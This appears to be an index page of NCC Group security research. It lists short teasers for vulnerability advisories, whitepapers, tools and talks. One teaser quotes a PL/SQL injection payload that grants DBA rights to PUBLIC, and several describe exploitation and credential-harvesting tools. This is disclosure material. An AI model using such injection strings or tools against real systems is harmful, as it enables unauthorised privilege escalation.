Cyber Security

Authors: David Brown and Mungomba Mulenga TL;dr NCC Group has observed what we believe to be the attempted exploitation of CVE-2021-42278 and CVE-2021-42287 as a means of privilege escalation, following the successful compromise of an Ivanti Secure Connect VPN using the following zero-day vulnerabilities reported by Volexity1 on 10/01/2024: By…

At Fox-IT (part of NCC Group) identifying servers that host nefarious activities is a critical aspect of our threat intelligence. One approach involves looking for anomalies in responses of HTTP servers. Sometimes cybercriminals that host malicious servers employ tactics that involve mimicking the responses of legitimate software to evade detection.…

Medical device security is gaining more attention for several reasons. The conversation often gets connected to device safety, that is, the degree to which the risk of patient harm is limited by preventing or controlling for device malfunction. Device security expands the scope of safety by supposing a malicious attacker…

We’ve published a whitepaper about how we built WiMap, which is a Wi-Fi mapping drone.  The paper includes details of the methods used to create, from parts, a hexacopter capable of being controlled over 3/4G and equipped to perform wireless and infrastructure assessments. We’d love to hear your feedback via…

Andy Davis, NCC Group’s Research Director presented Fuzzing the Easy Way Using Zulu at the 2014 Nullcon conference in Goa, India. The presentation describes how Zulu has been successfully used to discover high profile bugs and details the motivations for developing the tool. Download our slides

This whitepaper details the vulnerability and examines some of the concepts needed for browser exploitation before describing how to construct a working exploit that exits gracefully. Download whitepaper Authored by Katy Winterborn

This whitepaper details the vulnerability and examines some of the concepts needed for browser exploitation before describing how to construct a working exploit that exits gracefully. Download Whitepaper: Click to access cve-2014-0282.pdf Authored by Katy Winterborn

Vendor: KineticaVendor URL: https://www.kinetica.com/Versions affected: 7.0.9.2.20191118151947Systems Affected: AllAuthor: Gary Swales Gary.Swales@nccgroup.com Advisory URL / CVE Identifier: CVE-2020-8429Risk: High (Command Injection on the underlying operating system) Summary The Kinetica Admin web application version 7.0.9.2.20191118151947 did not properly sanitise the input for the function getLogs. This lack of sanitisation could be exploited…

Vendor: SumppleVendor URL: http://www.sumpple.comVersions affected: S610 firmware 9063.SUMPPLE.7601 - 9067.SUMPPLE.7601 Sumpple IP Cam Android V1.1.33 – V1.11 IOS 1.51.5986 (Previous versions are also likely to be affected)Systems Affected: Sumpple S610 WiFi Wireless PTZ Outdoor Security Video Network IP Camera Summple IP Cam Android and IOS mobile application.Author: Sebastian Parker-Fitch (@scorpioitsec)Advisory…

We are moving to a time where many ‘things’ that we know and use have the capability to be connected to a network either wired or wirelessly. The way we use technology is becoming more integrated in all aspects of our daily lives and is steadily integrating within the enterprise…

Over the past few years there has been an increase in the use of sound as a communications channel for device-to-device communications. This practice has been termed Data-Over-Sound (DOS) and has been billed as a cheap and easy to use alternative to traditional communications protocols such as Wi-Fi and Bluetooth.…

Quantum computing is still in its infancy but is expected to cause major changes to the technology landscape in coming years. Its ability to massively reduce the time taken for processes normally requiring large amounts of processing power is already causing concerns about the future of cryptography and the resistance…

Vendor: LansweeperVendor URL: https://www.lansweeper.com/Versions affected: prior to 7.1.117.4Systems Affected: Lansweeper applicationAuthor: Soroush Dalili (@irsdl)Advisory URL / CVE Identifier: https://www.lansweeper.com/changelog/ - CVE-2019-13462Risk: Critical when MSSQL database is in use (not default) Summary The Lansweeper application is agentless network inventory software that can be used for IT asset management. It uses the…

15 Security Advisories, 128 Jenkins Plugin Vulnerabilities and 1 Core Vulnerability118 CVEs, 1 CVE pending, 10 issues with no CVE requested About the Vulnerabilities NCC Group Security Consultant Viktor Gazdag has identified 128 security vulnerabilities across Jenkins plugins and one within the Jenkins core with the following distribution: Credentials stored…

Multiple vulnerabilities, ranging from information disclosure to remote code execution, were found in some Ricoh printers. The vulnerability list below was found affecting to some Ricoh printers: Multiple Buffer Overflows Parsing HTTP Cookie Headers (CVE-2019-14300) Multiple Buffer Overflows Parsing HTTP Parameters (CVE-2019-14305, CVE-2019-14307) Buffer Overflow Parsing LPD Packets (CVE-2019-14308) No…

Multiple vulnerabilities, ranging from information disclosure to remote code execution, were found in several Brother printers. The vulnerability list below was found affecting to several Brother printers: Stack Buffer Overflow in Cookie Values (CVE-2019-13193) Heap Overflow in IPP Attribute Name (CVE-2019-13192) Information Disclosure Vulnerability (CVE-2019-13194) Technical Advisories: Stack Buffer Overflow…

Multiple vulnerabilities, ranging from information disclosure to remote code execution, were found in several Xerox printers. The vulnerability list below was found affecting to several Xerox printers: Buffer Overflow in Google Cloud Print Implementation (CVE-2019-13171) Multiple Buffer Overflows in IPP Service (CVE-2019-13165, CVE-2019-13168) Multiple Buffer Overflows in Web Server (CVE-2019-13169,…

Multiple vulnerabilities, ranging from information disclosure to remote code execution, were found in several Kyocera printers. The vulnerability list below was found affecting to several Kyocera printers: Multiple Buffer Overflows in Web Server (CVE-2019-13196, CVE-2019-13197, CVE-2019-13202, CVE-2019-13203, CVE-2019-13206) Multiple Buffer Overflows in IPP Service (CVE-2019-13204) Buffer Overflow in LPD Service…

Multiple vulnerabilities, ranging Cross-Site Scripting to buffer overflows, were found in several HP printers: Multiple Buffer Overflows in IPP Service (CVE-2019-6327) Buffer Overflow in Web Server (CVE-2019-6326) Multiple Cross-Site Scripting Vulnerabilities (CVE-2019-6323, CVE-2019-6324) Cross-Site Request Forgery Countermeasures Bypass (CVE-2019-6325)   Technical Advisories: Multiple Buffer Overflows in IPP Service (CVE-2019-6327) Vendor:…

Multiple vulnerabilities, ranging from information disclosure to remote code execution, were found in several Lexmark printers. The vulnerability list below was found affecting to several Lexmark printers: SNMP Denial of Service Vulnerability (CVE-2019-9931) Multiple Overflows in Lexmark Web Server (CVE-2019-9930, CVE-2019-9932, CVE-2019-9933) Information Disclosure Vulnerabilities (CVE-2019-9934, CVE-2019-9935) Information Disclosure Vulnerability…

Vendor: IntelVendor URL: http://www.intel.com/Versions affected: Intel Driver Support Assistance prior to version 19.4.18Systems Affected: Microsoft WindowsAuthor: Richard Warren <richard.warren[at]nccgroup[dot]com>Advisory URL / CVE Identifier: CVE-2019-11114.Risk: Medium Summary This vulnerability allows a low privileged user to escalate their privileges to SYSTEM. Location Intel Driver Support Assistance – DSAService (DSACore.dll) Impact Upon successful…

Vendor: CitrixVendor URL: http://www.citrix.com/Versions affected: Citrix Workspace App versions prior to 1904 and Receiver for Windows versions prior to LTSR 4.9 CU6 version 4.9.6001Systems Affected: Microsoft WindowsAuthor: Ollie Whitehouse <ollie.whitehouse[at]nccgroup[dot]com> Richard Warren <richard.warren[at]nccgroup[dot]com> Martin Hill <martin.hill[at]nccgroup[dot]com>Advisory URL / CVE Identifier: CVE-2019-11634.Risk: Critical Summary The Citrix Workspace / Receiver client suffers…

This whitepaper addresses the cyber security threat to agriculture and the wider food network. The perspective and primary focus is the United Kingdom but the majority of observations on the structure of markets, technologies and related issues are largely applicable to other countries. Furthermore, some of the recommended actions identified in…

Connected Health is a rapidly growing area with huge innovative possibilities and potential. This is mostly due to the uptake of digital technologies in the health and medical fields that support diagnosis, treatment and management of health conditions. It is however crucially important that security of Connected Health products, systems…

Vendor: SmarterToolsVendor URL: https://www.smartertools.com/ Versions affected: prior to Build 6985 (CVE-2019-7214), prior to Build 7040 (CVE-2019-7211, CVE-2019-7212, CVE-2019-7213)Systems Affected: SmarterMailAuthor: Soroush Dalili (@irsdl)Advisory URL / CVE Identifier: CVE-2019-7214, CVE-2019-7213, CVE-2019-7212, CVE-2019-7211 https://www.smartertools.com/smartermail/release-notes/current Risk: Critical and High Summary The SmarterMail application is a popular mail server with rich features for normal…

Vendor: MailEnableVendor URL: https://www.mailenable.com/ Versions affected: versions before 10.24, 9.83, 8.64, 7.62, 6.90 (20th June 2019)Systems Affected: tested on Enterprise Premium but all versions have been patchedAuthor: Soroush Dalili (@irsdl)Advisory URL / CVE Identifier: CVE-2019-12923, CVE-2019-12924, CVE-2019-12925, CVE-2019-12926, CVE-2019-12927 http://www.mailenable.com/Premium-ReleaseNotes.txt http://www.mailenable.com/Premium-ReleaseNotes9.txt http://www.mailenable.com/Premium-ReleaseNotes8.txt http://www.mailenable.com/Premium-ReleaseNotes7.txt http://www.mailenable.com/Premium-ReleaseNotes6.txtRisk: Critical, High, Medium Summary The MailEnable…

Vendor: AvayaVendor URL: https://www.avaya.com/Versions affected: 10.0 through 10.1 SP3, 11.0Systems Affected: Avaya IP OfficeAuthor: Mattia Reggiani mattia.reggiani[at]nccgroup[dot]comAdvisory URL: https://downloads.avaya.com/css/P8/documents/101054317Advisory URL / CVE Identifier: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15614Risk: Medium Summary The One-X Web Portal was vulnerable to multiple persistent or stored cross-site scripting (XSS) vulnerabilities. This occurs when JavaScript or HTML code entered as…

These days it is quite common to see a deserialisation flaw in a product. Although awareness around finding and exploiting this type of vulnerability is out there for security researchers, developers can still struggle with securing their code especially when they are not fully aware of dangerous methods and functionalities…

  As part of our vulnerability research work at NCC Group we find many vulnerabilities (bugs) in commercial products and systems and for the past nine years we have kept a detailed internal log of these bugs. In this whitepaper prepared by Matt Lewis, Research Director at NCC Group, we…

Third parties can provide an invaluable resource and service for your organisation. But how far should you go when validating a third party supplier? What does the third party need to be validated against? How can you be confident that the validation process is effective? Is the validating process detrimental…

Whenever an outage on one of these cloud providers occurs, or a data breach of information held by them, the immediate press coverage starts asking whether they really are as secure and reliable as traditionally managed servers. This whitepaper provides an overview of public cloud services and the steps to…

Vendor: MicrosoftVendor URL: https://www.microsoft.com/Systems Affected: Microsoft OutlookAuthor: Soroush DaliliCVE Identifiers: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8572, https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11927Risk: Medium – Possible SMB Hash Hijacking or User Tracking Summary Microsoft Outlook could be abused to send SMB handshakes externally after a victim opening or simply viewing an email. A WebDAV request was sent even when the SMB…

Vendor: libSSHVendor URL: https://www.libssh.org/Versions affected: Versions of libSSH 0.6 and above, prior to 0.7.6 or 0.8.4.Author: Peter Winter-Smith peter.winter-smith[at]nccgroup.comAdvisory URL / CVE Identifier: CVE-2018-10933 - https://www.libssh.org/security/advisories/CVE-2018-10933.txtRisk: Critical – Authentication Bypass Summary libSSH is a library written in C which implements the SSH protocol and can be used to implement both…

Vendor: MicrosoftVendor URL: https://www.microsoft.com/Versions affected: .NET Framework before July 2018 patchSystems Affected: .NET Framework Workflow libraryAuthor: Soroush Dalili (@irsdl)Advisory URL / CVE Identifier: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8284 Risk: Critical Summary In the .NET Framework, workflows can be created by compiling an XOML file using the libraries within the System.Workflow namespace. The workflow compiler…

Vendor: Mitel Vendor URL: https://www.mitel.com Versions affected: 5330e IP Phone Systems Affected: Mitel MiVoice Author: Mattia Reggiani mattia.reggiani[at]nccgroup[dot]trust Advisory URL: https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-18-0009 CVE Identifier: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15497 Risk: Low-High (case dependent) – Denial of Service and possible Remote Code Execution Summary The Mitel MiVoice 5330e VoIP device is affected by a memory corruption…

Vendor: MicrosoftVendor URL: https://www.microsoft.com/Versions affected: .NET Framework before September 2018 patchSystems Affected: .NET Framework Workflow libraryAuthor: Soroush Dalili (@irsdl)Advisory URL / CVE Identifier: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8421 Risk: Critical Summary In the .NET Framework, workflows can be created by compiling an XOML file using the libraries within the System.Workflow namespace. The workflow compiler…

It’s not uncommon to find websites that attempt to validate user input and block code injection attacks using a blacklist of dangerous characters or keywords. Superficially, this might seem like a common-sense way to protect a website with minimum effort but it can prove to be extremely difficult to comprehensively…

Vendor: Virgin MediaVendor URL: https://www.virginmedia.com/Versions affected: products before Aug 2018 rollout / 9.1.116V and 9.1.885JSystems Affected: Hub 3.0Author: Balazs Bucsay (@xoreipeip)Advisory URL / CVE Identifier: NoneRisk: Critical Summary Multiple security vulnerabilities were found in the device’s firmware that could be chained and led to unauthenticated remote command execution. Location Multiple…

This paper discusses the similarities and differences between professional ethics in the information security industry and ethics in the hacker community. Sources of conflict and shared values of the two are discussed in order to find some reconciliation and come to an understanding of how a shared set of ethics…

It has been known for a while that deserialisation of untrusted data can often lead to serious security issues such as code execution. However, finding such issues might not be a trivial task during time-limited penetration testing. As a result, NCC Group has developed a Burp Suite extension called Freddy [1]…

The concept of Open Banking is an innovative one. However, as with any new developments surrounding sensitive financial information it is imperative to assess the security implications of these actions. Matthew Pettitt discusses the pros and cons of the planned implementation and potential risks of Open Banking in NCC Group’s…

Scenester – a tool to visually snapshot a website by supplying multiple user-agent. Designed to aid in discovery of different entry points into an application. For more information and to download the tool, visit our GitHub page here.

Automate NMAP scans and custom Nessus polices. Features include:  Discovers live devices Auto launches port scans on only the discoverd live devices Can run mulitple instances on multiple adaptors at once Creates client Ref directory for each scan Outputs all unique open ports in a Nessus ready format. Much faster…

A collection of tools to enumerate and analyse Windows DACLs: Tool 1: Process Perms Tool 2: Windows Stations and Desktops  Tool 3: Services  Tool 4: File Sytem  Tool 5 Registry   For more information and to download the tool visit our GitHub page here. 

umap is a USB host security assessment tool, based on Facedancer by Travis Goodspeed.  For more information and to download the tool visit our GitHub page here.

A tool to find and exploit servers vulnerable to Shellshock. To download the tool, please visit our Github page here.

Zulu is an interactive GUI based fuzzer. The tool is input and output agnostic, therefore when you are happy with using the fuzzing engine that’s driven by the GUI you are only limited by the input and output modules that have been developed for it. To download the tool, please…

This proto-type was originally designed a developed during Christmas 2008 / 2009 to show how a non signature based AV could reliably detect malicious code. For more information and to download the tool, visit our GitHub page here. 

vlan-hopping is a simple VLAN enumeration and hopping script, developed by Daniel Compton.  For more information and to download the tool, visit our GitHub page here. 

Tybocer is a new view on code review. When presented with a new piece of code to review it is useful to search through for common terms, or to hunt down specific definitions of particular functions. For more information and to download the tool visit our GitHub page here.

A network data locator using credentials obtained during penetration tests. Xcavator is a tool that scans a range of IP addresses for services that host files (FTP, FTPS and SMB at the moment) and for given credentials it will try to download everything it can and scan within the files…

A Microsoft Windows Process Lockdown Tool using Job Objects, developed by Ollie Whitehouse.  To download the tool visit our GitHub page here.

Vendor: ManageEngineVendor URL: https://www.manageengine.com/products/desktop-central/Versions affected: 10.0.124 and 10.0.184 verified, all versions <= 10.0.184 suspectedSystems Affected: AllAuthor: Ben Lincoln <ben.lincoln[at]nccgroup[dot]trust>Advisory URLs: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5337, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5338, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5339, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5340, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5341, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5342Risk: Critical (unauthenticated remote code execution) Summary Desktop Central is integrated desktop and mobile device management software that helps in managing servers, laptops, desktops, smartphones,…

Vendor: MicrosoftVendor URL: https://www.microsoft.com/Versions affected: products before July 2018 patchSystems Affected: Visual Studio, .NET Framework, SharePointAuthor: Soroush Dalili (@irsdl)Advisory URL / CVE Identifier: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8172 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8260 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8300Risk: Medium to High Summary A number of deserialisation issues within the resource files (.resx and .resources) were reported to Microsoft in January 2018 by…

Vendor: RedgateVendor URL: https://www.red-gate.com/Versions affected: prior to 10.0.7.774 (24th July, 2018)Systems Affected: .NET ReflectorAuthor: Soroush Dalili (@irsdl)Advisory URL / CVE Identifier: https://documentation.red-gate.com/ref10/release-notes-and-other-versions/net-reflector-10-0-release-notes (CVE-2018-14581)Risk: Critical Summary It was possible to execute code by decompiling a compiled .Net object (such as DLL or EXE) with an embedded resource file. An attacker could…

Vendor: Jenkins Delivery Pipeline Plugin Vendor URL: https://plugins.jenkins.io/delivery-pipeline-plugin Versions affected: 1.0.7 (up to and including) Systems Affected: Jenkins Author: Viktor Gazdag viktor.gazdag[at]nccgroup[dot]trust Advisory URL / CVE Identifier: https://jenkins.io/security/advisory/2017-11-16/ Risk: Medium – 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) (Reflected Cross-Site Scripting) Summary The Delivery Pipeline Plugin is a Jenkins plugin that helps visualizing the delivery/build…

While there are many claims that cyber security is an indispensable necessary cost, there is also a body of opinion that cyber security does not always justify its costs and the financial impacts of a breach are frequently either exaggerated or unclear. As a response to these concerns, this whitepaper…

“We’re entering a new world in which data may be more important than software.” Tim O’Reilly Following from our recent CISO research council, our research team have put together this whitepaper, which explores the evolutionary steps in ransomware and malicious code and what NCC Group’s current perspective is. Ransomware as…

With the exponential increase of online services over the last decade, it is no surprise that the theft of credentials from poorly-secured applications is a growing concern and data breaches are becoming more of a regular occurrence. Even if we manage to secure and lock down these applications, do we…

Security is a high priority for most organisations. A string of high priority breaches in big multinational companies has brought home the threat that all organisations face in the modern world. Therefore, a growing number of companies are considering how to best protect themselves and reduce the impact of a…

Most of us interact with Artificial Intelligence (AI) or Machine Learning (ML) on a daily basis without even knowing; from Google translate, to facial recognition software on our mobile phones and digital assistance in financial services or call centres. It is a growing market with ever increasing possibilities across all…

Working closely with our clients both on site or at events, we are finding that several remain unclear on the topic of breach notification under GDPR. There seems to be little, focused guidance on the topic despite the fact that the new regulation will be enforced from May 2018. This…

Vendor: AdobeVendor URL: https://www.adobe.com/uk/products/coldfusion-family.htmlSystems Affected: ColdFusion 2016 update 4 and below, ColdFusion 11 update 12 and belowAuthor: Nick Bloor (@NickstaDB) / nick.bloor@nccgroup.comAdvisory URL: https://helpx.adobe.com/security/products/coldfusion/apsb17-30.htmlCVE Identifier: CVE-2017-11284Risk: Critical (unauthenticated remote code/command execution) Summary Adobe ColdFusion supports Flex integration to enable Flash applications to interact with ColdFusion components. This is achieved using…

Vendor: AdobeVendor URL: https://www.adobe.com/uk/products/coldfusion-family.htmlSystems Affected: ColdFusion 2016 update 4 and below, ColdFusion 11 update 12 and belowAuthor: Nick Bloor (@NickstaDB) / nick.bloor@nccgroup.comAdvisory URL: https://helpx.adobe.com/security/products/coldfusion/apsb17-30.htmlCVE Identifier: CVE-2017-11283Risk: Critical (unauthenticated remote code/command execution) Summary Adobe ColdFusion supports Flex integration to enable Flash applications to interact with ColdFusion components. This is achieved using…

Following from our recent CISO research council, our research team have put together this whitepaper, which explores the use of PowerShell in a modern corporate environment and how to mitigate the associated threats. Since its incarnation in 2006, PowerShell has grown to be a powerful and extensible management tool, allowing for…

Vendor: tsl0922Vendor URL: https://github.com/tsl0922/ttyd/ (https://tsl0922.github.io/ttyd/)Versions affected: 1.3.0 (<=)Author: Donato Ferrante <donato.ferrante[at]nccgroup[dot]trust>Patch URL: https://github.com/tsl0922/ttyd/commit/4d31e534c0ec20582d91210990969c19b68ab3b0Risk: Critical Summary ttyd is a cross platform (e.g. macOS, Linux, FreeBSD, OpenWrt/LEDE, Windows) tool for sharing a terminal over the web, inspired by GoTTY. ttyd may allow remote attackers to execute shell commands on a victim’s system,…

Continuous integration (CI) has long left the stage of experimental practices and moved into mainstream software development. It is used everywhere from start-ups to large organisations, in a variety of technology stacks and problem domains, from web applications to embedded software. However, the security implications of introducing CI are often…

The popularity of USB usage has grown and it has become a common vehicle for spreading malware. As such, the need to protect IT assets from a cyber attack is paramount and from a physical endpoint perspective, this presents a challenging dynamic when wanting to prevent a data breach via…

On the 17th April 2007 Oracle released their 10th Critical Patch Update. This brief discusses the database flaws and EM01 which relates to the Intelligent Agent. Many of the flaws being patched are old issues. For example, DB01 relates to an issue first reported to Oracle in 2002 and another in June…

Buffer Underruns and Stack Protection Starting with Windows 2003 Server, Microsoft introduced a number of Exploitation Prevention Mechanisms (XPMs) into their software. Over time these XPMs were refined as weaknesses were discovered [1][2] and more XPMs were introduced. Today the XPMs have been added to Windows XP Service Pack 2…

When drilling for data via SQL injection there are three classes of attack – inband, out-of-band and the relatively unknown inference attack. Inband attacks extract data over the same channel between the client and the web server, for example, results are embedded in a web page via a union select. Out-of-band attacks employ…

Exploiting well knows flaws in DNS services and the way in which host names are resolved to IP addresses, Phishers have upped the ante in the cyber war for control of a customer’s online identity for financial gain. A grouping attack vectors now referred to as “Pharming”, affects the fundamental…

The objective of this series of papers is to describe the mathematical properties of some of the more common pseudo-random sequence generators and to show how they can be attacked by illustrating the principles with real-world bugs. The series demonstrates how weak randomness can be identified, used to compromise real-world systems, and defended against.…

When exploiting PL/SQL injection flaws in SELECT/UPDATE/INSERT/DELETE statements it has long been known that if an attacker can create their own function, and inject this, then it is possible for them to execute arbitrary PL/SQL code – for example EXECUTE IMMEDIATE ‘GRANT DBA TO PUBLIC’. Of course, if the attacker can’t create their own…

This paper presents a number of technical discussion points relating to the potential for exploiting stack overflow vulnerabilities without having direct access to the application which is to be exploited. The points raised in this paper discuss the key issues which would need to be overcome in order to do this, as well…

Technology trail-blazing organisations such as large financial institutions have been working to secure their custom applications for several years, but the second-tier “technology following” organisations have been too slow to follow. This is now rapidly changing due to recent bad press following many highly publicised security compromises. In many of…

The paper is intended to be read by the portion of the security community responsible for creating protective mechanisms to guard against “shellcode” type security flaws; the intention is to remove the perception that Unicode buffer overflows are non exploitable and thereby improve the general state of network security. It…

This paper discusses the feasibility of violating the access control, authentication and audit mechanisms of a running process in the Windows server operating systems. Specifically, it discusses the feasibility of totally disabling application – enforced access control in a running service, taking SQL Server 2000 as a sizeable and meaningful…

Agenda The role of the BIOS Attacking a legacy BIOS Limitations of the legacy BIOS Introduction to the EFI environment Attacking the EFI environment UEFI, summary and conclusions Some Caveats… This talk is about rootkit persistenceThis persistence How to deploy a rootkit from the BIOS/EFIHow EFI Not concerned with what…

Objectives Discuss current “threat landscape” Introduce a new class of vulnerability Introduce a new method of attack Show practical demonstrations Look at some defences Download presentation Author: David Litchfield

Agenda Recap of ACPI BIOS rootkit and limitations Brief overview of the PCI Bus Abusing expansion ROMs Abusing PXE Detection, Prevention and the TPM Summary and conclusions Download presentation Author: John Heasman

The Past, Present and Future of Database Security In 2006 there were 335 publicized data breaches in the U.S. So far in 2007 there have been 276. With the 5th anniversary of the SQL Slammer worm drawing near, now is a good a time as any to look back on…

This paper presents several methods of bypassing the protection mechanism built into Microsoft’s Windows 2003 Server that attempts to prevent the exploitation of stack based buffer overflows. Recommendations about how to thwart these attacks are made where appropriate. Microsoft is committed to security. I’ve been playing with Microsoft products, as…

Over the last two decades, both Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks have been growing in frequency, complexity and volume. Traditionally, these attacks are associated with botnets and large amounts of traffic aimed at disrupting Internet-facing services. However, while the goal of these attacks remains…

VoIP Security Issues The issues brought up in VoIP security and throughout this presentation are not new and are not a surprise. Telephony experience and IP experience combined with a security focused mindset are enough to combat these issues. There is a lot of public coverage of VoIP issues, however…

Many IIS web servers running ASP applications will use the CDONTS.NEWMAIL object to provide the functionality for feedback or contact forms. This paper will examine how the CDONTS.NEWMAIL object can be used by attackers to send arbitrary e-mails via the vulnerable web server and what must be done to prevent an online ASP…

In Oracle, a failure to close cursors created and used by DBMS_SQL or a failure to clean up open cursors in the event of an exception can lead to a security hole. If the cursor in question has been created by higher privileged code and left hanging then it’s possible for a low…

This paper presents some unexpected consequences of running database servers on Windows XP with Simple File Sharing enabled. In the real world, this kind of setup would typically be a developer’s system and as it turns out, in some cases depending on the database software, you might not just be sharing your files…

DNS-based attacks can be used to perform a partial breach of browser same origin restrictions in some situations, enabling a malicious web site to perform two-way interaction with a different domain. The attacks that are normally conceived against browser-based DNS pinning are capable of being resolved through additional safeguards within…

Vendor: Microsoft Vendor URL: https://www.microsoft.com/ Versions affected: IE 10, 11, and Edge prior to July 2017 patch Systems Affected: Windows with above versions affected Author: Soroush Dalili Advisory URL / CVE Identifier: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8592 Risk: Low Summary Internet Explorer (or Edge) could be used to send arbitrary messages to a target…

This paper will examine the differences between the security posture of Microsoft’s SQL Server and Oracle’s RDBMS based upon flaws reported by external security researchers and since fixed by the vendor in question. Only flaws affecting the database server software itself have been considered in compiling this data so issues that affect, for example,…

This paper will examine the differences and commonality in the way a vulnerability common to both Windows and Linux is exploited on each system. The VulnerabilityThe vulnerability that will be discussed in this paper is a classic stack based overflow in OracleÕs RDBMS 9.2.0.1. As well as offering the standard SQL service,…

“Security within the Internet of Things (IoT) is currently below par.” The statement above derives from many observations across our work in IoT (and that of the wider security research community) in addition to a myriad of regular, publicly reported issues and security concerns with IoT devices and their infrastructures.…

Data Loss Prevention (DLP) is a security control aimed at highlighting when sensitive data leaves the corporate network or is accessed without authorisation. A DLP solution can be a great asset to a business and support a range of security goals and compliance. It can be an invaluable safety net…

With one click, his entire business was in the hands of someone else. Sensitive company information, bank account details, social media profiles, various other usernames and passwords. All stolen by a cyber criminal in a convincing phishing attempt. The email he’d received looked legitimate. It was just a simple request…

“By far the greatest danger of Artificial Intelligence is that people conclude too early that they understand it.”  Eliezer Yudkowsky At NCC Group, we are researching Machine Learning (ML) and Artificial Intelligence (AI) from a number of different angles in order to fully understand the pros and cons of ML…

The modern vehicle has become increasingly computerised as the demand for cleaner emissions and better transport safety for drivers and pedestrians has grown. Numerous initiatives are currently underway to begin to address this threat and to bring the principles used within traditional enterprise environments (such as the Secure Development Lifecycle)…

It is a widely held belief that the vast majority of threats to businesses are from outside attackers, with the stereotypical view of hackers trying to make money through crime.  The problem with this viewpoint is that it does not consider the threat from a malicious insider. There is a…

Biometric facial recognition is becoming an increasingly popular mechanism for authenticating users in online and mobile environments. In addition, it is continually being adopted for physical access control, whether at border controls such as airports or within secure facilities to enforce strict access control (and/or time and attendance tracking) to…

Following from our recent CISO research council, our research team have put together this whitepaper, which explores encryption at rest. Encryption at rest is not a panacea to data protection due to its complexity and the utility of data. Often, misconceptions can (and do) arise whereby it is believed that…

An NCC Group whitepaper: Applying normalised compression distance for architecture classification When working with malware research and black box penetration testing, it is not always clear what data you are working on and in order to disassemble binaries properly, one needs to know the architecture that the binary has been…

Title                                  D-LINK DIR-850L web admin interface vulnerable to stack-based buffer overflow Reference                         VT-95 Discoverer                …

Vendor: Oracle Vendor URL: http://www.oracle.com/  Versions affected: 11.1.2.4 (previous versions may also be affected) Systems Affected: Oracle Hyperion Financial Reporting Web Studio Author: Mathew Nash Mathew.Nash[at]nccgroup[dot]trust, Fabio Pires Fabio.pires[at]nccgroup[dot]trust Advisory URL: http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html  CVE Identifier: CVE-2017-10310 Risk: High (Unauthenticated local file read, server-side request forgery or denial of service) Summary The…

Vendor: macvim-dev Vendor URL: http://macvim.org Versions affected: snapshot-110 Author: Daniel Crowley <daniel.crowley[at]nccgroup[dot]trust> Bug discovery credit: Anonymous Advisory URL / CVE Identifier: TBD Risk: Critical Summary MacVim is a Mac OS port of Vim. MacVim is vulnerable to shell injection in mvim:// URIs through the column parameter, allowing attacks through a…

Vendor: Atlassian Vendor URL: http://atlassian.com Versions affected: v1.9.8 known affected version, earlier versions possible Systems Affected: Mac OS X known affected, others possible Author: Daniel Crowley <daniel.crowley[at]nccgroup[dot]trust> Advisory URL / CVE Identifier: https://jira.atlassian.com/browse/SRCTREE-4481 Risk: Critical (reliable remote code execution) Summary SourceTree is a product for working with various types of…

Vendor: Accellion, Inc. Vendor URL: http://www.accellion.com/ Versions affected: FTA_9_12_40, FTA_9_12_51, FTA_9_12_110, others likely Systems Affected: Accellion File Transfer Appliance Author: Daniel Crowley <daniel.crowley[at]nccgroup[dot]trust> Advisory URL / CVE Identifier: TBD Risk: Critical Summary The Accellion File Transfer Appliance (FTA) is an alternative to traditional email and FTP services for file transfers.…

An NCC Group whitepaper Regardless of the size, scope, geography or sector of your organisation, there are common elements that should be considered when it comes to cyber security due diligence during the M A process. This whitepaper aims to cover the risks, opportunities and responsibilities associated with cyber security…

Title                                  Privilege Escalation in CA Common Services casrvc due to Arbitrary WriteReference                        VT-37Discoverer                      …

In today’s modern society the requirement for employees to be based within a corporate office is minimal, largely due to remote working gaining prominence. The cost to provide remote working or mobile technology to employees can, however, be expensive. An ideal solution to this cost issue is enabling the employee…

Vendor: Rapid7, Inc.Vendor URL: http://rapid7.comVersions affected: 6.4.9 2016-11-30 and potentially all prior releases.Systems Affected: Nexpose Vulnerability ScannerAuthor: Noah Beddome, Justin Lemay, and Ben LincolnAdvisory URL / CVE Identifier: 2017-5230Risk: Medium - Requires specific access criteria Summary The Nexpose vulnerability scanner by Rapid7 is widely used to identify network and application…

Title                             Java RMI Registry.bind() Unvalidated DeserializationReference                   VT-87Discoverer                  Nick Bloor (@NickstaDB)Vendor                  …

Every organisation faces uncertainty and this is often a key challenge in achieving its objectives. Much of this uncertainty comes from an inability to accurately predict future events. Generally, we can define a potential future event that could affect an organisation’s objectives as a ‘risk’ and the process of forecasting…

Title                           iOS MobileSlideShow USB Image Class arbitrary code executionRelease Date           15 December 2016Reference                 NCC00249Discoverer                Andy DavisVendor  …

Title                             Denial of Service in Parsing a URL by ierutil.dllReference                   VT-20Discoverer                  Soroush DaliliVendor            …

These slides are from David Middlehurst’s presentation at the BSides Manchester conference. The presentation includes information on a new open source tool called ‘UPnP Pentest Tookit’. Download Presentation

These slides are from Jerome Smith’s presentation at BSides MCR 2014. It tackles the subject of SSL/TLS testing from the viewpoint of a penetration tester. It is a practical guide, broad in scope, focusing on pitfalls and how to check issues manually (as much as possible). Download presentation

These slides are from Robert Ray’s presentation at the Trust Forum in Edinburgh. The presentation looks at the common social engineering tactics and provides hints and tips on how to detect, prevent and respond to a social engineering attack. Download presentation

